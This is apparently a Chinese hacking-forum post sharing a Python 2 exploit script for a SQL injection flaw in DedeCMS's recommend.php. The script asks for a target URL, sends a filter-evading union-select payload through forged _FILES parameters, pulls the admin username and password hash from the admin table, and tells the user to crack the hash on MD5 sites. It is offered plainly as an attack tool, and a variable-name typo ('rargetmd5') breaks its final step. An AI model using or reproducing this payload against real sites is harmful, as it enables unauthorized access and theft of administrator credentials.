dedecms recommend 注入 exp

我看没人用python写过发过 所以我就发一下
喜欢用python的就用我这个吧 不喜欢的就用JAR那个或者PHP那个吧

1. #coding:GBK
2. import  re
3. import urllib
4. """
5. dedecms recommend 注入 exp
6. by ziwen Q504824480
7. f4ck team
8. v5ae team
9. guest team
10. """
11. def md5chuli(md5):
12.     clhmd5=""
13.     md5len=len(md5)
14.     if md5len==32:
15.         clhmd=md5[6:25]
16.         clhmd5=clhmd[3:24]
17.     return clhmd5
18. error=[]
19. target=""
20. target=raw_input("输入目标 要带有http哦！")
21. b=r".+\..+\..+"
22. d=re.findall(b,target)
23. if d==error:
24.     print "你输入的是链接么？"
25.     exit()
26. else:
27.     print "start fuck"
28. target2=target+"/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\' or mid=@`\'` /*!50000union*//*!50000select*/1,2,3,(select CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin` limit+0,1),5,6,7,8,9%23@`\'`+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=6878"
29. print target2
30. url=urllib.urlopen(target2)
31. page=url.read()
32. print page
33. pipei=r"<h2>|(.+)|.+|</h2>"
34. print re.findall(pipei,page)
35. pipeimd5=r"<h2>|.+|(.+)|</h2>"
36. targetmd5=re.findall(pipeimd5,page)
37. print md5chuli(rargetmd5)
38. print "上面即为账号和密码其中之一组 MD5已经处理过 可以直接拿去各大MD5站进行解密"
39. print "如果上面什么也没输出来 说明该站没此漏洞"